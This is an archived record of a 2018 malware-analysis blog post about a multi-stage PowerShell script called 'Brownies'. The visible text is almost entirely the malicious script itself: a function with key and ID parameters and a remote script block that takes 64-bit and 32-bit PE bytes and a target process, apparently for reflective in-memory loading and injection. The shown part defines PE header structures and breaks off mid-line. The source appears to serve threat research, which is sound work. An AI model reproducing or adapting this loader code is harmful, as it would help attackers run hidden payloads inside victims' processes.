{
	"id": "95ab94f5-bb98-4b1c-98ac-60fefa71444e",
	"created_at": "2026-04-06T00:19:49.59026Z",
	"updated_at": "2026-04-10T13:12:41.776582Z",
	"deleted_at": null,
	"sha1_hash": "ff623f88a26afa5d118a0d0724b6cedd683bdee8",
	"title": "Multi-stage Powershell script (Brownies)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2483696,
	"plain_text": "Multi-stage Powershell script (Brownies)\r\nBy Malwrologist\r\nPublished: 2018-03-28 · Archived: 2026-04-05 23:49:06 UTC\r\nfunction   get-fgruvers\r\n{\r\n[ CmdletBinding ()]\r\nParam (\r\n[ Parameter ( Position   =0)]\r\n[String[]]\r\n$ComputerName ,\r\n[ Parameter ( Position   =1,Mandatory   =$false )]\r\n[String]\r\n$fpath ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[String]\r\n$idsid ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[String]\r\n$versid ,\r\n[ Parameter ( Position   =4,Mandatory   =$true )]\r\n[String]\r\n$rckey\r\n)\r\nSet-StrictMode   -Version2\r\n$RemoteScriptBlock   ={\r\n[ CmdletBinding ()]\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[String]\r\n$PEBytes64 ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[String]\r\n$PEBytes32 ,\r\n[ Parameter ( Position   =2,Mandatory   =$false )]\r\n[String]\r\n$FuncReturnType ,\r\n[ Parameter ( Position   =3,Mandatory   =$false )]\r\n[Int32]\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 1 of 57\n\n$ProcId ,\r\n[ Parameter ( Position   =4,Mandatory   =$false )]\r\n[String]\r\n$ProcName ,\r\n[ Parameter ( Position   =5,Mandatory   =$false )]\r\n[String]\r\n$ExeArgs\r\n)\r\nFunction   Get-Win32Types\r\n{\r\n$Win32Types   =New-Object   System.Object\r\n$Domain   =[AppDomain] ::CurrentDomain\r\n$DynamicAssembly   =New-Object   System.Reflection.AssemblyName( 'DynamicAssembly' )\r\n$AssemblyBuilder   =$Domain .DefineDynamicAssembly( $DynamicAssembly ,[System.Reflection.Emit.AssemblyBuilderAccess] ::Run)\r\n$ModuleBuilder   =$AssemblyBuilder .DefineDynamicModule( 'DynamicModule' ,$false )\r\n$ConstructorInfo   =[System.Runtime.InteropServices.MarshalAsAttribute] .GetConstructors()[0]\r\n$TypeBuilder   =$ModuleBuilder .DefineEnum( 'MachineType' ,'Public' ,[UInt16] )\r\n$TypeBuilder .DefineLiteral( 'Native' ,[UInt16]   0)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'I386' ,[UInt16]   0x014c)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'Itanium' ,[UInt16]   0x0200)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'x64' ,[UInt16]   0x8664)|Out-Null\r\n$MachineType   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameMachineType-Value$MachineType\r\n$TypeBuilder   =$ModuleBuilder .DefineEnum( 'MagicType' ,'Public' ,[UInt16] )\r\n$TypeBuilder .DefineLiteral( 'IMAGE_NT_OPTIONAL_HDR32_MAGIC' ,[UInt16]   0x10b)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_NT_OPTIONAL_HDR64_MAGIC' ,[UInt16]   0x20b)|Out-Null\r\n$MagicType   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameMagicType-Value$MagicType\r\n$TypeBuilder   =$ModuleBuilder .DefineEnum( 'SubSystemType' ,'Public' ,[UInt16] )\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_UNKNOWN' ,[UInt16]   0)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_NATIVE' ,[UInt16]   1)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_WINDOWS_GUI' ,[UInt16]   2)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_WINDOWS_CUI' ,[UInt16]   3)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_POSIX_CUI' ,[UInt16]   7)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_WINDOWS_CE_GUI' ,[UInt16]   9)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_EFI_APPLICATION' ,[UInt16]   10)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER' ,[UInt16]   11)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER' ,[UInt16]   12)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_EFI_ROM' ,[UInt16]   13)|Out-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 2 of 57\n\n$TypeBuilder .DefineLiteral( 'IMAGE_SUBSYSTEM_XBOX' ,\r\n[UInt16]   14)|Out-Null\r\n$SubSystemType   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameSubSystemType-Value$SubSystemType\r\n$TypeBuilder   =$ModuleBuilder .DefineEnum( 'DllCharacteristicsType' ,'Public' ,[UInt16] )\r\n$TypeBuilder .DefineLiteral( 'RES_0' ,[UInt16]   0x0001)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'RES_1' ,[UInt16]   0x0002)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'RES_2' ,[UInt16]   0x0004)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'RES_3' ,[UInt16]   0x0008)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE' ,[UInt16]   0x0040)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY' ,[UInt16]   0x0080)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLL_CHARACTERISTICS_NX_COMPAT' ,[UInt16]   0x0100)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLLCHARACTERISTICS_NO_ISOLATION' ,[UInt16]   0x0200)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLLCHARACTERISTICS_NO_SEH' ,[UInt16]   0x0400)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLLCHARACTERISTICS_NO_BIND' ,[UInt16]   0x0800)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'RES_4' ,[UInt16]   0x1000)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLLCHARACTERISTICS_WDM_DRIVER' ,[UInt16]   0x2000)|Out-Null\r\n$TypeBuilder .DefineLiteral( 'IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE' ,[UInt16]   0x8000)|\r\nOut-Null\r\n$DllCharacteristicsType   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameDllCharacteristicsType-\r\nValue$DllCharacteristicsType\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,ExplicitLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_DATA_DIRECTORY' ,$Attributes ,[System.ValueType] ,8)\r\n( $TypeBuilder .DefineField( 'VirtualAddress' ,[UInt32] ,'Public' )).SetOffset(0)|Out-Null\r\n( $TypeBuilder .DefineField( 'Size' ,[UInt32] ,'Public' )).SetOffset(4)|Out-Null\r\n$IMAGE_DATA_DIRECTORY   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_DATA_DIRECTORY-\r\nValue$IMAGE_DATA_DIRECTORY\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_FILE_HEADER' ,$Attributes ,[System.ValueType] ,20)\r\n$TypeBuilder .DefineField( 'Machine' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfSections' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'TimeDateStamp' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'PointerToSymbolTable' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfSymbols' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'SizeOfOptionalHeader' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Characteristics' ,[UInt16] ,'Public' )|Out-Null\r\n$IMAGE_FILE_HEADER   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_FILE_HEADER-Value$IMAGE_FILE_HEADER\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,ExplicitLayout,Sealed,BeforeFieldInit'\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 3 of 57\n\n$TypeBuilder   =\r\n$ModuleBuilder .DefineType( 'IMAGE_OPTIONAL_HEADER64' ,$Attributes ,[System.ValueType] ,240)\r\n( $TypeBuilder .DefineField( 'Magic' ,$MagicType ,'Public' )).SetOffset(0)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorLinkerVersion' ,[Byte] ,'Public' )).SetOffset(2)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorLinkerVersion' ,[Byte] ,'Public' )).SetOffset(3)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfCode' ,[UInt32] ,'Public' )).SetOffset(4)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfInitializedData' ,[UInt32] ,'Public' )).SetOffset(8)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfUninitializedData' ,[UInt32] ,'Public' )).SetOffset(12)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'AddressOfEntryPoint' ,[UInt32] ,'Public' )).SetOffset(16)|Out-Null\r\n( $TypeBuilder .DefineField( 'BaseOfCode' ,[UInt32] ,'Public' )).SetOffset(20)|Out-Null\r\n( $TypeBuilder .DefineField( 'ImageBase' ,[UInt64] ,'Public' )).SetOffset(24)|Out-Null\r\n( $TypeBuilder .DefineField( 'SectionAlignment' ,[UInt32] ,'Public' )).SetOffset(32)|Out-Null\r\n( $TypeBuilder .DefineField( 'FileAlignment' ,[UInt32] ,'Public' )).SetOffset(36)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorOperatingSystemVersion' ,[UInt16] ,'Public' )).SetOffset(40)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'MinorOperatingSystemVersion' ,[UInt16] ,'Public' )).SetOffset(42)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'MajorImageVersion' ,[UInt16] ,'Public' )).SetOffset(44)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorImageVersion' ,[UInt16] ,'Public' )).SetOffset(46)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorSubsystemVersion' ,[UInt16] ,'Public' )).SetOffset(48)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorSubsystemVersion' ,[UInt16] ,'Public' )).SetOffset(50)|Out-Null\r\n( $TypeBuilder .DefineField( 'Win32VersionValue' ,[UInt32] ,'Public' )).SetOffset(52)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfImage' ,[UInt32] ,'Public' )).SetOffset(56)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeaders' ,[UInt32] ,'Public' )).SetOffset(60)|Out-Null\r\n( $TypeBuilder .DefineField( 'CheckSum' ,[UInt32] ,'Public' )).SetOffset(64)|Out-Null\r\n( $TypeBuilder .DefineField( 'Subsystem' ,$SubSystemType ,'Public' )).SetOffset(68)|Out-Null\r\n( $TypeBuilder .DefineField( 'DllCharacteristics' ,$DllCharacteristicsType ,'Public' )).SetOffset(70)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'SizeOfStackReserve' ,[UInt64] ,'Public' )).SetOffset(72)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfStackCommit' ,[UInt64] ,'Public' )).SetOffset(80)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeapReserve' ,[UInt64] ,'Public' )).SetOffset(88)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeapCommit' ,[UInt64] ,'Public' )).SetOffset(96)|Out-Null\r\n( $TypeBuilder .DefineField( 'LoaderFlags' ,[UInt32] ,'Public' )).SetOffset(104)|Out-Null\r\n( $TypeBuilder .DefineField( 'NumberOfRvaAndSizes' ,[UInt32] ,'Public' )).SetOffset(108)|Out-Null\r\n( $TypeBuilder .DefineField( 'ExportTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(112)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'ImportTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(120)|\r\nOut-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 4 of 57\n\n( $TypeBuilder .DefineField( 'ResourceTable' ,\r\n$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(128)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'ExceptionTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(136)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'CertificateTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(144)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'BaseRelocationTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(152)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'Debug' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(160)|Out-Null\r\n( $TypeBuilder .DefineField( 'Architecture' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(168)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'GlobalPtr' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(176)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'TLSTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(184)|Out-Null\r\n( $TypeBuilder .DefineField( 'LoadConfigTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(192)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'BoundImport' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(200)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'IAT' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(208)|Out-Null\r\n( $TypeBuilder .DefineField( 'DelayImportDescriptor' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(216)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'CLRRuntimeHeader' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(224)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'Reserved' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(232)|Out-Null\r\n$IMAGE_OPTIONAL_HEADER64   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_OPTIONAL_HEADER64-\r\nValue$IMAGE_OPTIONAL_HEADER64\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,ExplicitLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_OPTIONAL_HEADER32' ,$Attributes ,[System.ValueType] ,224)\r\n( $TypeBuilder .DefineField( 'Magic' ,$MagicType ,'Public' )).SetOffset(0)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorLinkerVersion' ,[Byte] ,'Public' )).SetOffset(2)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorLinkerVersion' ,[Byte] ,'Public' )).SetOffset(3)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfCode' ,[UInt32] ,'Public' )).SetOffset(4)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfInitializedData' ,[UInt32] ,'Public' )).SetOffset(8)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfUninitializedData' ,[UInt32] ,'Public' )).SetOffset(12)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'AddressOfEntryPoint' ,[UInt32] ,'Public' )).SetOffset(16)|Out-Null\r\n( $TypeBuilder .DefineField( 'BaseOfCode' ,[UInt32] ,'Public' )).SetOffset(20)|Out-Null\r\n( $TypeBuilder .DefineField( 'BaseOfData' ,[UInt32] ,'Public' )).SetOffset(24)|Out-Null\r\n( $TypeBuilder .DefineField( 'ImageBase' ,[UInt32] ,'Public' )).SetOffset(28)|Out-Null\r\n( $TypeBuilder .DefineField( 'SectionAlignment' ,[UInt32] ,'Public' )).SetOffset(32)|Out-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 5 of 57\n\n( $TypeBuilder .DefineField( 'FileAlignment' ,\r\n[UInt32] ,'Public' )).SetOffset(36)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorOperatingSystemVersion' ,[UInt16] ,'Public' )).SetOffset(40)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'MinorOperatingSystemVersion' ,[UInt16] ,'Public' )).SetOffset(42)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'MajorImageVersion' ,[UInt16] ,'Public' )).SetOffset(44)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorImageVersion' ,[UInt16] ,'Public' )).SetOffset(46)|Out-Null\r\n( $TypeBuilder .DefineField( 'MajorSubsystemVersion' ,[UInt16] ,'Public' )).SetOffset(48)|Out-Null\r\n( $TypeBuilder .DefineField( 'MinorSubsystemVersion' ,[UInt16] ,'Public' )).SetOffset(50)|Out-Null\r\n( $TypeBuilder .DefineField( 'Win32VersionValue' ,[UInt32] ,'Public' )).SetOffset(52)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfImage' ,[UInt32] ,'Public' )).SetOffset(56)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeaders' ,[UInt32] ,'Public' )).SetOffset(60)|Out-Null\r\n( $TypeBuilder .DefineField( 'CheckSum' ,[UInt32] ,'Public' )).SetOffset(64)|Out-Null\r\n( $TypeBuilder .DefineField( 'Subsystem' ,$SubSystemType ,'Public' )).SetOffset(68)|Out-Null\r\n( $TypeBuilder .DefineField( 'DllCharacteristics' ,$DllCharacteristicsType ,'Public' )).SetOffset(70)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'SizeOfStackReserve' ,[UInt32] ,'Public' )).SetOffset(72)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfStackCommit' ,[UInt32] ,'Public' )).SetOffset(76)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeapReserve' ,[UInt32] ,'Public' )).SetOffset(80)|Out-Null\r\n( $TypeBuilder .DefineField( 'SizeOfHeapCommit' ,[UInt32] ,'Public' )).SetOffset(84)|Out-Null\r\n( $TypeBuilder .DefineField( 'LoaderFlags' ,[UInt32] ,'Public' )).SetOffset(88)|Out-Null\r\n( $TypeBuilder .DefineField( 'NumberOfRvaAndSizes' ,[UInt32] ,'Public' )).SetOffset(92)|Out-Null\r\n( $TypeBuilder .DefineField( 'ExportTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(96)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'ImportTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(104)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'ResourceTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(112)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'ExceptionTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(120)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'CertificateTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(128)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'BaseRelocationTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(136)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'Debug' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(144)|Out-Null\r\n( $TypeBuilder .DefineField( 'Architecture' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(152)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'GlobalPtr' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(160)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'TLSTable' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(168)|Out-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 6 of 57\n\n( $TypeBuilder .DefineField( 'LoadConfigTable' ,\r\n$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(176)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'BoundImport' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(184)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'IAT' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(192)|Out-Null\r\n( $TypeBuilder .DefineField( 'DelayImportDescriptor' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(200)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'CLRRuntimeHeader' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(208)|\r\nOut-Null\r\n( $TypeBuilder .DefineField( 'Reserved' ,$IMAGE_DATA_DIRECTORY ,'Public' )).SetOffset(216)|Out-Null\r\n$IMAGE_OPTIONAL_HEADER32   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_OPTIONAL_HEADER32-\r\nValue$IMAGE_OPTIONAL_HEADER32\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_NT_HEADERS64' ,$Attributes ,[System.ValueType] ,264)\r\n$TypeBuilder .DefineField( 'Signature' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'FileHeader' ,$IMAGE_FILE_HEADER ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'OptionalHeader' ,$IMAGE_OPTIONAL_HEADER64 ,'Public' )|Out-Null\r\n$IMAGE_NT_HEADERS64   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_NT_HEADERS64-Value$IMAGE_NT_HEADERS64\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_NT_HEADERS32' ,$Attributes ,[System.ValueType] ,248)\r\n$TypeBuilder .DefineField( 'Signature' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'FileHeader' ,$IMAGE_FILE_HEADER ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'OptionalHeader' ,$IMAGE_OPTIONAL_HEADER32 ,'Public' )|Out-Null\r\n$IMAGE_NT_HEADERS32   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_NT_HEADERS32-Value$IMAGE_NT_HEADERS32\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_DOS_HEADER' ,$Attributes ,[System.ValueType] ,64)\r\n$TypeBuilder .DefineField( 'e_magic' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_cblp' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_cp' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_crlc' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_cparhdr' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_minalloc' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_maxalloc' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_ss' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_sp' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_csum' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_ip' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_cs' ,[UInt16] ,'Public' )|Out-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 7 of 57\n\n$TypeBuilder .DefineField( 'e_lfarlc' ,\r\n[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_ovno' ,[UInt16] ,'Public' )|Out-Null\r\n$e_resField   =$TypeBuilder .DefineField( 'e_res' ,[UInt16[]] ,'Public,HasFieldMarshal' )\r\n$ConstructorValue   =[System.Runtime.InteropServices.UnmanagedType] ::ByValArray\r\n$FieldArray   =@( [System.Runtime.InteropServices.MarshalAsAttribute] .GetField( 'SizeConst' ))\r\n$AttribBuilder   =New-Object   System.Reflection.Emit.CustomAttributeBuilder( $ConstructorInfo ,\r\n$ConstructorValue ,$FieldArray ,@( [Int32]   4))\r\n$e_resField .SetCustomAttribute( $AttribBuilder )\r\n$TypeBuilder .DefineField( 'e_oemid' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'e_oeminfo' ,[UInt16] ,'Public' )|Out-Null\r\n$e_res2Field   =$TypeBuilder .DefineField( 'e_res2' ,[UInt16[]] ,'Public,HasFieldMarshal' )\r\n$ConstructorValue   =[System.Runtime.InteropServices.UnmanagedType] ::ByValArray\r\n$AttribBuilder   =New-Object   System.Reflection.Emit.CustomAttributeBuilder( $ConstructorInfo ,\r\n$ConstructorValue ,$FieldArray ,@( [Int32]   10))\r\n$e_res2Field .SetCustomAttribute( $AttribBuilder )\r\n$TypeBuilder .DefineField( 'e_lfanew' ,[Int32] ,'Public' )|Out-Null\r\n$IMAGE_DOS_HEADER   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_DOS_HEADER-Value$IMAGE_DOS_HEADER\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_SECTION_HEADER' ,$Attributes ,[System.ValueType] ,40)\r\n$nameField   =$TypeBuilder .DefineField( 'Name' ,[Char[]] ,'Public,HasFieldMarshal' )\r\n$ConstructorValue   =[System.Runtime.InteropServices.UnmanagedType] ::ByValArray\r\n$AttribBuilder   =New-Object   System.Reflection.Emit.CustomAttributeBuilder( $ConstructorInfo ,\r\n$ConstructorValue ,$FieldArray ,@( [Int32]   8))\r\n$nameField .SetCustomAttribute( $AttribBuilder )\r\n$TypeBuilder .DefineField( 'VirtualSize' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'VirtualAddress' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'SizeOfRawData' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'PointerToRawData' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'PointerToRelocations' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'PointerToLinenumbers' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfRelocations' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'NumberOfLinenumbers' ,[UInt16] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'Characteristics' ,[UInt32] ,'Public' )|Out-Null\r\n$IMAGE_SECTION_HEADER   =$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   -MemberTypeNoteProperty-NameIMAGE_SECTION_HEADER-\r\nValue$IMAGE_SECTION_HEADER\r\n$Attributes   ='AutoLayout,AnsiClass,Class,Public,SequentialLayout,Sealed,BeforeFieldInit'\r\n$TypeBuilder   =$ModuleBuilder .DefineType( 'IMAGE_BASE_RELOCATION' ,$Attributes ,[System.ValueType] ,8)\r\n$TypeBuilder .DefineField( 'VirtualAddress' ,[UInt32] ,'Public' )|Out-Null\r\n$TypeBuilder .DefineField( 'SizeOfBlock' ,[UInt32] ,'Public' )|Out-Null\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 8 of 57\n\n$IMAGE_BASE_RELOCATION   =\r\n$TypeBuilder .CreateType()\r\n$Win32Types   |Add-Member   